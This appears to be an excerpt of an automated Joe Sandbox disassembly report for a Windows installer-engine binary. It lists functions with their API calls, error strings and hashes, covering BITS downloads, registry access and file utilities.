Associated: 00000001.00000002.3582273539.0000000000CEC000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_c90000_UNK_.jbxd

Similarity

API ID: Heap$AllocateCreateErrorKnownLastProcessWell
String ID: Failed to allocate memory for well known SID.$Failed to create well known SID.$cache.cpp
API String ID: 2186923214-2110050797
Opcode ID: c27187854ddeb96fe04024d8f152dc9e8ad836db21da3ff93ec4158f81528483
Instruction ID: 8d692e2e159a12f31a1e5ae746b2318564f0823eaa246b5417f7fbf500465c58
Opcode Fuzzy Hash: c27187854ddeb96fe04024d8f152dc9e8ad836db21da3ff93ec4158f81528483
Instruction Fuzzy Hash: 6711E93264921676D33016618C06F5F2659AB82B75F250129FA15EB280EF74DE0052A4

Function 00CB7D5F Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 65windowCOMMON

Download Yara Rule

APIs

MsgWaitForMultipleObjects.USER32(00000001,?,00000000,000003E8,000004FF), ref: 00CB7D90
PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 00CB7DB8
GetLastError.KERNEL32 ref: 00CB7DC0

Strings

bitsengine.cpp, xrefs: 00CB7DEA
Failed while waiting for download., xrefs: 00CB7DF4

Memory Dump Source

Source File: 00000001.00000002.3582108218.0000000000C91000.00000020.00000001.01000000.00000005.sdmp, Offset: 00C90000, based on PE: true

Associated: 00000001.00000002.3582060680.0000000000C90000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3582170095.0000000000CCB000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3582232594.0000000000CE6000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3582273539.0000000000CEC000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_c90000_UNK_.jbxd

Similarity

API ID: ErrorLastMessageMultipleObjectsPeekWait
String ID: Failed while waiting for download.$bitsengine.cpp
API String ID: 435350009-228655868
Opcode ID: a4743f68025fab634d3f87c195aad489c12b070eaa5faff261c569cebbb4bb9a
Instruction ID: 00f676b93fbb267a75e05d33b412a52786ec13e0d30164662b770246a0d628cf
Opcode Fuzzy Hash: a4743f68025fab634d3f87c195aad489c12b070eaa5faff261c569cebbb4bb9a
Instruction Fuzzy Hash: D211C472A44209FFDB109BE4CD86EEE7BB8EF44350F20017AFA01E6180DA759F009660

Function 00C976E5 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 65COMMON

Download Yara Rule

APIs

_MREFOpen@16.MSPDB140-MSVCRT ref: 00C97703

Strings

Failed to format path string., xrefs: 00C9770E
Failed get file version., xrefs: 00C9773B
File search: %ls, did not find path: %ls, xrefs: 00C9776F
Failed to set variable., xrefs: 00C9775B

Memory Dump Source

Source File: 00000001.00000002.3582108218.0000000000C91000.00000020.00000001.01000000.00000005.sdmp, Offset: 00C90000, based on PE: true

Associated: 00000001.00000002.3582060680.0000000000C90000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3582170095.0000000000CCB000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3582232594.0000000000CE6000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3582273539.0000000000CEC000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_c90000_UNK_.jbxd

Similarity

API ID: Open@16
String ID: Failed get file version.$Failed to format path string.$Failed to set variable.$File search: %ls, did not find path: %ls
API String ID: 3613110473-2458530209
Opcode ID: c48daf1e414c96f4ff287faeb2fc72b7d2cf5f57b64da41386941b8c88921569
Instruction ID: bb14763543eadd4797283a2e219f04723ca6ed1f72f06c3dfa18168043053f87
Opcode Fuzzy Hash: c48daf1e414c96f4ff287faeb2fc72b7d2cf5f57b64da41386941b8c88921569
Instruction Fuzzy Hash: E3112337A54108FADF03ABE4CE4AFAE7777AB80700F214279F514A2160EB719B55B701

Function 00C92EAE Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 65COMMON

Download Yara Rule

APIs

_memcpy_s.LIBCMT ref: 00C92F01
_memcpy_s.LIBCMT ref: 00C92F14
_memcpy_s.LIBCMT ref: 00C92F2F

Part of subcall function 00CB8891: _memmove.LIBCMT ref: 00CB88CD
Part of subcall function 00CB8891: _memset.LIBCMT ref: 00CB88DF

Strings

Failed to allocate memory for message., xrefs: 00C92EEA
pipe.cpp, xrefs: 00C92EDE

Memory Dump Source

Source File: 00000001.00000002.3582108218.0000000000C91000.00000020.00000001.01000000.00000005.sdmp, Offset: 00C90000, based on PE: true

Associated: 00000001.00000002.3582060680.0000000000C90000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3582170095.0000000000CCB000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3582232594.0000000000CE6000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3582273539.0000000000CEC000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_c90000_UNK_.jbxd

Similarity

API ID: _memcpy_s$_memmove_memset
String ID: Failed to allocate memory for message.$pipe.cpp
API String ID: 3316475362-1914209504
Opcode ID: 61992f7afb9dcaff0dacec7cfc544432f253d18c1e202ccdd8f3bcec7ad18d67
Instruction ID: 949c83bcaa123973861fa2d8312299a44c8835717f6bb02b663e87ba341d44a1
Opcode Fuzzy Hash: 61992f7afb9dcaff0dacec7cfc544432f253d18c1e202ccdd8f3bcec7ad18d67
Instruction Fuzzy Hash: 3911A0B654421DBBDF12AE95CC85DEB37ACFF08750F00002AFA5497141EB759A14D7E0

Function 00C9A025 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 58COMMON

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32(?), ref: 00C9A038

Part of subcall function 00CC054B: GetModuleHandleW.KERNEL32(kernel32,IsWow64Process,00000000,?,?,00C99175,00000000), ref: 00CC055F
Part of subcall function 00CC054B: GetProcAddress.KERNEL32(00000000), ref: 00CC0566
Part of subcall function 00CC054B: GetLastError.KERNEL32(?,?,00C99175,00000000), ref: 00CC057D

Part of subcall function 00CC6897: SHGetFolderPathW.SHELL32(00000000,?,00000000,00000000,?), ref: 00CC68C4

Strings

Failed to set variant value., xrefs: 00C9A09A
Failed to get shell folder., xrefs: 00C9A06B
variable.cpp, xrefs: 00C9A061
Failed to get 64-bit folder., xrefs: 00C9A081

Memory Dump Source

Source File: 00000001.00000002.3582108218.0000000000C91000.00000020.00000001.01000000.00000005.sdmp, Offset: 00C90000, based on PE: true

Associated: 00000001.00000002.3582060680.0000000000C90000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3582170095.0000000000CCB000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3582232594.0000000000CE6000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3582273539.0000000000CEC000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_c90000_UNK_.jbxd

Similarity

API ID: AddressCurrentErrorFolderHandleLastModulePathProcProcess
String ID: Failed to get 64-bit folder.$Failed to get shell folder.$Failed to set variant value.$variable.cpp
API String ID: 2084161155-3906113122
Opcode ID: 1f6e22f7a98d6c5deb2ba5f839eb0b93799381593ba90785cbd1e1464a07a5fb
Instruction ID: 53a27c7cdbcde11586141b9ceb1672d7dd007297156c922e90d6decb2477c89b
Opcode Fuzzy Hash: 1f6e22f7a98d6c5deb2ba5f839eb0b93799381593ba90785cbd1e1464a07a5fb
Instruction Fuzzy Hash: CC01C471840518FA8F21BBA8DC0AD9EBBB8DB94760F20416AF919B2150E6304E40BA91

Function 00C992CB Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 58COMMON

Download Yara Rule

APIs

GetComputerNameW.KERNEL32(?,?), ref: 00C992F9
GetLastError.KERNEL32 ref: 00C99303

Strings

Failed to set variant value., xrefs: 00C9934B
Failed to get computer name., xrefs: 00C99332
variable.cpp, xrefs: 00C99328

Memory Dump Source

Source File: 00000001.00000002.3582108218.0000000000C91000.00000020.00000001.01000000.00000005.sdmp, Offset: 00C90000, based on PE: true

Associated: 00000001.00000002.3582060680.0000000000C90000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3582170095.0000000000CCB000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3582232594.0000000000CE6000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3582273539.0000000000CEC000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_c90000_UNK_.jbxd

Similarity

API ID: ComputerErrorLastName
String ID: Failed to get computer name.$Failed to set variant value.$variable.cpp
API String ID: 3560734967-484636765
Opcode ID: cacdbe9080089a789c5c8f2c5ae5e03148d0a9c7a0d4335ac18f2d9024956359
Instruction ID: 8cbfc337f076fa90cbbb2152bff8dc48a3de80e6d958e4ee76867e3b89df2a33
Opcode Fuzzy Hash: cacdbe9080089a789c5c8f2c5ae5e03148d0a9c7a0d4335ac18f2d9024956359
Instruction Fuzzy Hash: 2B01E573A40619A6DB11EE99DC0AFDE77ECAF08710F14002EF904F7290DA70EE0487A5

Function 00CC622F Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 56fileCOMMON

Download Yara Rule

APIs

Part of subcall function 00CC5D81: _memset.LIBCMT ref: 00CC5DAC
Part of subcall function 00CC5D81: FindFirstFileW.KERNEL32(00000000,?,00000000,?,00000000), ref: 00CC5DBC
Part of subcall function 00CC5D81: FindClose.KERNEL32(00000000), ref: 00CC5DC8

SetFileAttributesW.KERNEL32(00000000,00000080,00000000,?,00000000,000000FF,00000000,?,?,00CA94EB,00000000,00000000,E0000136,00000000,?,00000000), ref: 00CC6264
GetLastError.KERNEL32(?,?,00CA94EB,00000000,00000000,E0000136,00000000,?,00000000,00000000), ref: 00CC626E
DeleteFileW.KERNEL32(00000000,00000000,?,00000000,000000FF,00000000,?,?,00CA94EB,00000000,00000000,E0000136,00000000,?,00000000,00000000), ref: 00CC628D
GetLastError.KERNEL32(?,?,00CA94EB,00000000,00000000,E0000136,00000000,?,00000000,00000000), ref: 00CC6297

Strings

fileutil.cpp, xrefs: 00CC62B1

Memory Dump Source

Source File: 00000001.00000002.3582108218.0000000000C91000.00000020.00000001.01000000.00000005.sdmp, Offset: 00C90000, based on PE: true

Associated: 00000001.00000002.3582060680.0000000000C90000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3582170095.0000000000CCB000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3582232594.0000000000CE6000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3582273539.0000000000CEC000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_c90000_UNK_.jbxd

Similarity

API ID: File$ErrorFindLast$AttributesCloseDeleteFirst_memset
String ID: fileutil.cpp
API String ID: 1255660700-2967768451
Opcode ID: 1f93e7199776bc1e283ee318cca639e918fe2fc0aca91ca55ada985e777789d4
Instruction ID: 600d697d48971cdd0d8c4086a55d34c163dfecafd8333a87e1658041f0da9c4c
Opcode Fuzzy Hash: 1f93e7199776bc1e283ee318cca639e918fe2fc0aca91ca55ada985e777789d4
Instruction Fuzzy Hash: D801B57130030ABAEB111BFACE8AFAB3A9CAF58759F04013DF912D51A1EBA0CE445650

Function 00CC06A4 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 55synchronizationCOMMON

Download Yara Rule

APIs

WaitForSingleObject.KERNEL32(000001F4,?,00CB3EB0,?,?,00CAAE28,?,000001F4,?,?,?,?,?,?,?,?), ref: 00CC06B4
GetLastError.KERNEL32(?,?,00CAAE28,?,000001F4,?,?,?,?,?,?,?,?), ref: 00CC06C2
GetExitCodeProcess.KERNEL32(000001F4,?), ref: 00CC06FE
GetLastError.KERNEL32(?,?,00CAAE28,?,000001F4,?,?,?,?,?,?,?,?), ref: 00CC0708

Strings

procutil.cpp, xrefs: 00CC072D

Memory Dump Source

Source File: 00000001.00000002.3582108218.0000000000C91000.00000020.00000001.01000000.00000005.sdmp, Offset: 00C90000, based on PE: true

Associated: 00000001.00000002.3582060680.0000000000C90000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3582170095.0000000000CCB000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3582232594.0000000000CE6000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3582273539.0000000000CEC000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_c90000_UNK_.jbxd

Similarity

API ID: ErrorLast$CodeExitObjectProcessSingleWait
String ID: procutil.cpp
API String ID: 590199018-1178289305
Opcode ID: 9aeca2826d9552767ac57fd16a8b67df38e6bf9d9e18640669505f100212e7b8
Instruction ID: 8785ac629e6f4baa8f4c3b76f3f2a7cf1dc6a61914dbe7de0c32d795071a3b71
Opcode Fuzzy Hash: 9aeca2826d9552767ac57fd16a8b67df38e6bf9d9e18640669505f100212e7b8
Instruction Fuzzy Hash: 06118672A40225EBDB105F95CC0AF9E7A54EF00760F35016CFC25EB250D674DE50EB90

Function 00CB4DEC Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 54synchronizationCOMMON

Download Yara Rule

APIs

WaitForSingleObject.KERNEL32(?,000000FF,00000002,?,?,00CB5023), ref: 00CB4DFC
ReleaseMutex.KERNEL32(?,?,?,00CB5023), ref: 00CB4E81

Part of subcall function 00CC2955: GetProcessHeap.KERNEL32(?,?,?,00CC0FA3,?,00000001,?,00000000,00000000,?,?,?,00CBFD43,?,?,00000000), ref: 00CC2966
Part of subcall function 00CC2955: RtlAllocateHeap.NTDLL(00000000,?,00CC0FA3,?,00000001,?,00000000,00000000,?,?,?,00CBFD43,?,?,00000000,00000000), ref: 00CC296D

_memmove.LIBCMT ref: 00CB4E68

Strings

NetFxChainer.cpp, xrefs: 00CB4E3B
Failed to allocate memory for message data, xrefs: 00CB4E48

Memory Dump Source

Source File: 00000001.00000002.3582108218.0000000000C91000.00000020.00000001.01000000.00000005.sdmp, Offset: 00C90000, based on PE: true

Associated: 00000001.00000002.3582060680.0000000000C90000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3582170095.0000000000CCB000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3582232594.0000000000CE6000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3582273539.0000000000CEC000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_c90000_UNK_.jbxd

Similarity

API ID: Heap$AllocateMutexObjectProcessReleaseSingleWait_memmove
String ID: Failed to allocate memory for message data$NetFxChainer.cpp
API String ID: 2689949979-1624333943
Opcode ID: f66bc645da09ba7c054e7b792583c56a95c308991238af2bc689ce0c87e6015a
Instruction ID: 957eea0fb53cc9b85f87bad1aa4bcad4abe1af28ee155465b670cd71a3d7eabb
Opcode Fuzzy Hash: f66bc645da09ba7c054e7b792583c56a95c308991238af2bc689ce0c87e6015a
Instruction Fuzzy Hash: 051166B1200301EFCB209F68C84AF6AB7F4EB48314F204568F9169B391EB31E904DB14

Function 00C99AB0 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 52COMMON

Download Yara Rule

APIs

GetUserNameW.ADVAPI32(?,?), ref: 00C99AE0
GetLastError.KERNEL32 ref: 00C99AEA

Strings

Failed to set variant value., xrefs: 00C99B30
Failed to get the user name., xrefs: 00C99B14
variable.cpp, xrefs: 00C99B0A

Memory Dump Source

Source File: 00000001.00000002.3582108218.0000000000C91000.00000020.00000001.01000000.00000005.sdmp, Offset: 00C90000, based on PE: true

Associated: 00000001.00000002.3582060680.0000000000C90000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3582170095.0000000000CCB000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3582232594.0000000000CE6000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3582273539.0000000000CEC000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_c90000_UNK_.jbxd

Similarity

API ID: ErrorLastNameUser
String ID: Failed to get the user name.$Failed to set variant value.$variable.cpp
API String ID: 2054405381-1522884404
Opcode ID: 0e63de6918b5139962ccb0fa7d454c0a93799035e67ef84000efdedca68a5dbe
Instruction ID: 64c444552039bdf7dece81498400c5d077aef7e208e18de18c296ff04157f50f
Opcode Fuzzy Hash: 0e63de6918b5139962ccb0fa7d454c0a93799035e67ef84000efdedca68a5dbe
Instruction Fuzzy Hash: C901D671B41229ABDB21AB58DC5AFAF77ACDF14710F10016DF414E6281DA78DA449A90

Function 00CB800E Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 50COMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32(?), ref: 00CB8023
LeaveCriticalSection.KERNEL32(?), ref: 00CB8068
SetEvent.KERNEL32(?,?,?,?), ref: 00CB807C

Strings

Failure while sending progress during BITS job modification., xrefs: 00CB8057
Failed to get state during job modification., xrefs: 00CB803C

Memory Dump Source

Source File: 00000001.00000002.3582108218.0000000000C91000.00000020.00000001.01000000.00000005.sdmp, Offset: 00C90000, based on PE: true

Associated: 00000001.00000002.3582060680.0000000000C90000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3582170095.0000000000CCB000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3582232594.0000000000CE6000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3582273539.0000000000CEC000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_c90000_UNK_.jbxd

Similarity

API ID: CriticalSection$EnterEventLeave
String ID: Failed to get state during job modification.$Failure while sending progress during BITS job modification.
API String ID: 3094578987-1258544340
Opcode ID: ca58e09dbb8e06ec1b6e9ba00f6c293cd835771a4237bee28b91e8c606825e9b
Instruction ID: 40769a72685349ed3fa75a00102ae0b666cef2c36decb253273f5d758f7eee3d
Opcode Fuzzy Hash: ca58e09dbb8e06ec1b6e9ba00f6c293cd835771a4237bee28b91e8c606825e9b
Instruction Fuzzy Hash: 1C019E76100709EFCB119F95E849E9F73BCEB85364F10401EE50A93210EF34EA48DB20

Function 00CB7E0D Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 50COMMON

Download Yara Rule

APIs

InitializeCriticalSection.KERNEL32(00000008,00000000,?,?,00CB819C,?,?,?,?,?,00000000,?,00000000), ref: 00CB7E27
CreateEventW.KERNEL32(00000000,00000001,00000000,00000000,?,00CB819C,?,?,?,?,?,00000000,?,00000000), ref: 00CB7E34
GetLastError.KERNEL32(?,00CB819C,?,?,?,?,?,00000000,?,00000000), ref: 00CB7E41

Strings

bitsengine.cpp, xrefs: 00CB7E66
Failed to create BITS job complete event., xrefs: 00CB7E70

Memory Dump Source

Source File: 00000001.00000002.3582108218.0000000000C91000.00000020.00000001.01000000.00000005.sdmp, Offset: 00C90000, based on PE: true

Associated: 00000001.00000002.3582060680.0000000000C90000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3582170095.0000000000CCB000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3582232594.0000000000CE6000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3582273539.0000000000CEC000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_c90000_UNK_.jbxd

Similarity

API ID: CreateCriticalErrorEventInitializeLastSection
String ID: Failed to create BITS job complete event.$bitsengine.cpp
API String ID: 3069647169-3441864216
Opcode ID: 0c5652cf8fa934d2041a201c11ee56621c960c39ce811f2faa379446e8d6f74b
Instruction ID: b039880f941bbaec5ee3c103bbeb6365acaaf2aa83786e0d5ab3f6daed460029
Opcode Fuzzy Hash: 0c5652cf8fa934d2041a201c11ee56621c960c39ce811f2faa379446e8d6f74b
Instruction Fuzzy Hash: 0B014CB1254706AFE3209FA9D886BA7B7ECFF08752F10453EF95AC6240E6B4DC404B64

Function 00CB7C44 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 49COMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32(00000008,?,00000000,00000000,00000000,?,00CB7DAE), ref: 00CB7C58
LeaveCriticalSection.KERNEL32(00000008,?,00CB7DAE), ref: 00CB7C9D
SetEvent.KERNEL32(?,?,00CB7DAE), ref: 00CB7CB1

Strings

Failure while sending progress., xrefs: 00CB7C8C
Failed to get BITS job state., xrefs: 00CB7C71

Memory Dump Source

Source File: 00000001.00000002.3582108218.0000000000C91000.00000020.00000001.01000000.00000005.sdmp, Offset: 00C90000, based on PE: true

Associated: 00000001.00000002.3582060680.0000000000C90000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3582170095.0000000000CCB000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3582232594.0000000000CE6000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3582273539.0000000000CEC000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_c90000_UNK_.jbxd

Similarity

API ID: CriticalSection$EnterEventLeave
String ID: Failed to get BITS job state.$Failure while sending progress.
API String ID: 3094578987-2876445054
Opcode ID: a2dd5dfdb0fcd3f50a38fdfdad24ff3338f9ce4893ef59cf5fd98053f5fe5515
Instruction ID: cb4909e2fe99dc865fde27db293107ecb1cb38d1e10dace7db05fd032e2e259e
Opcode Fuzzy Hash: a2dd5dfdb0fcd3f50a38fdfdad24ff3338f9ce4893ef59cf5fd98053f5fe5515
Instruction Fuzzy Hash: F901B1B6204705EFC7128B95D94EEAF77E8EBC4321F10021EE90B93210DB74E9409660

Function 00C9BBD1 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 44COMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32(?,?,?,00000000,?,00C9DA59,?,00000000,75C0B390,?,00000000), ref: 00C9BBE0
InterlockedCompareExchange.KERNEL32(?,00000001,00000000), ref: 00C9BBED
LeaveCriticalSection.KERNEL32(?,?,00C9DA59,?,00000000,75C0B390,?,00000000), ref: 00C9BC02

Strings

userexperience.cpp, xrefs: 00C9BC1B
Engine active cannot be changed because it was already in that state., xrefs: 00C9BC25

Memory Dump Source

Source File: 00000001.00000002.3582108218.0000000000C91000.00000020.00000001.01000000.00000005.sdmp, Offset: 00C90000, based on PE: true

Associated: 00000001.00000002.3582060680.0000000000C90000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3582170095.0000000000CCB000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3582232594.0000000000CE6000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3582273539.0000000000CEC000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_c90000_UNK_.jbxd

Similarity

API ID: CriticalSection$CompareEnterExchangeInterlockedLeave
String ID: Engine active cannot be changed because it was already in that state.$userexperience.cpp
API String ID: 3376869089-1544469594
Opcode ID: 1792f869e682c58d01caa8364d55644fd691e3f4a41f443764d08d9a97be6de3
Instruction ID: a5563b82b618cdaa29f0a8d7b8974a84efd3c7c1a1188b44a0eb85c235ff85f1
Opcode Fuzzy Hash: 1792f869e682c58d01caa8364d55644fd691e3f4a41f443764d08d9a97be6de3
Instruction Fuzzy Hash: 02F0F672244319BFAB101AE5ED89FAB77ACEB55B91B05002AFD01AA180DF61AD0482B0

Function 00C99028 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 42COMMON

Download Yara Rule

APIs

Part of subcall function 00C98F71: FreeLibrary.KERNEL32(00000000), ref: 00C9901D

_memset.LIBCMT ref: 00C99040
GetVersionExW.KERNEL32(?,?,00000000,00C990EC), ref: 00C9904F
GetLastError.KERNEL32 ref: 00C99059

Strings

Failed to get OS version from GetVersionExW, xrefs: 00C99088
variable.cpp, xrefs: 00C9907E

Memory Dump Source

Source File: 00000001.00000002.3582108218.0000000000C91000.00000020.00000001.01000000.00000005.sdmp, Offset: 00C90000, based on PE: true

Associated: 00000001.00000002.3582060680.0000000000C90000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3582170095.0000000000CCB000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3582232594.0000000000CE6000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3582273539.0000000000CEC000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_c90000_UNK_.jbxd

Similarity

API ID: ErrorFreeLastLibraryVersion_memset
String ID: Failed to get OS version from GetVersionExW$variable.cpp
API String ID: 2453953334-413229814
Opcode ID: f52bfd0bb672369090f1fb8d6d2419281a8521985ee70fad1837de705aea038b
Instruction ID: 0bed1d6946724dba4fc40c73ae81513ad8cd0f2ae1761099d9924a026d258e50
Opcode Fuzzy Hash: f52bfd0bb672369090f1fb8d6d2419281a8521985ee70fad1837de705aea038b
Instruction Fuzzy Hash: DBF09AA17803076AFB102AFAACCBF6B069C9B65B55F14003DFA24D9192EFA8C8082514

Function 00CC8688 Relevance: 7.6, APIs: 5, Instructions: 119registryCOMMON

Download Yara Rule

APIs

Part of subcall function 00CC3DFC: RegOpenKeyExW.KERNELBASE(00000000,00000000,00000000,00000000,00000001,00000000,00000000,?,00CC7B1F,80000002,00000000,00020019,00000000,SOFTWARE\Policies\,00000000,00000000), ref: 00CC3E10

RegCloseKey.ADVAPI32(00000001,00000001,?,00000000,00000001,?,00000000,00000001,00000000,00020019,00000001,00C913BB,00C913BB,00020019,00000000,00000001), ref: 00CC8751
RegCloseKey.ADVAPI32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000001,?,00000000,00000001,?,00000000,00000001,00000000,00020019), ref: 00CC8792
RegCloseKey.ADVAPI32(00000001,00000001,00020019,00C913BB,?,00C913BB,00000000,00000000,?,00C913BB,00000001,00000000), ref: 00CC87B3
RegCloseKey.ADVAPI32(00000000,00000001,00020019,00C913BB,?,00C913BB,00000000,00000000,?,00C913BB,00000001,00000000), ref: 00CC87C4
RegCloseKey.ADVAPI32(00C913BB,?,00C913BB,00000000,00000000,?,00C913BB,00000001,00000000), ref: 00CC87D8

Part of subcall function 00CC3FDE: RegCloseKey.ADVAPI32(00000000), ref: 00CC4144

Part of subcall function 00CC3CE8: RegQueryInfoKeyW.ADVAPI32(00C913BB,00000000,00000000,00000000,?,00000000,00000000,00C913BB,00000000,00000000,00000000,00000000,80070002,00000000,?,00CC873D), ref: 00CC3D03

Memory Dump Source

Source File: 00000001.00000002.3582108218.0000000000C91000.00000020.00000001.01000000.00000005.sdmp, Offset: 00C90000, based on PE: true

Associated: 00000001.00000002.3582060680.0000000000C90000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3582170095.0000000000CCB000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3582232594.0000000000CE6000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3582273539.0000000000CEC000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_c90000_UNK_.jbxd

Similarity

API ID: Close$InfoOpenQuery
String ID:
API String ID: 796878624-0
Opcode ID: 8d0099c5ee11a7dd21c4713837c12f237bca3453ceef216c80bae268fb8bf0e6
Instruction ID: 5cf57e73f5c1b224a8dfd838872982343ab795a1d00fffac951b0cdd51b50e70
Opcode Fuzzy Hash: 8d0099c5ee11a7dd21c4713837c12f237bca3453ceef216c80bae268fb8bf0e6
Instruction Fuzzy Hash: 7F416371901128FBCF229F94DC85E9EBE79EF08B90F20846AF915E6121D7354B94AB90

Function 00C910DC Relevance: 7.6, APIs: 5, Instructions: 98COMMON

Download Yara Rule

APIs

CloseHandle.KERNEL32(?,00000000,?,?,00C91ED9,?,?,?,?,?), ref: 00C91120
DeleteCriticalSection.KERNEL32(?,00000000,?,?,00C91ED9,?,?,?,?,?), ref: 00C9113A
TlsFree.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 00C9120B
DeleteCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 00C91212
_memset.LIBCMT ref: 00C9121C

Memory Dump Source

Source File: 00000001.00000002.3582108218.0000000000C91000.00000020.00000001.01000000.00000005.sdmp, Offset: 00C90000, based on PE: true

Associated: 00000001.00000002.3582060680.0000000000C90000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3582170095.0000000000CCB000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3582232594.0000000000CE6000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3582273539.0000000000CEC000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_c90000_UNK_.jbxd

Similarity

API ID: CriticalDeleteSection$CloseFreeHandle_memset
String ID:
API String ID: 3611737199-0
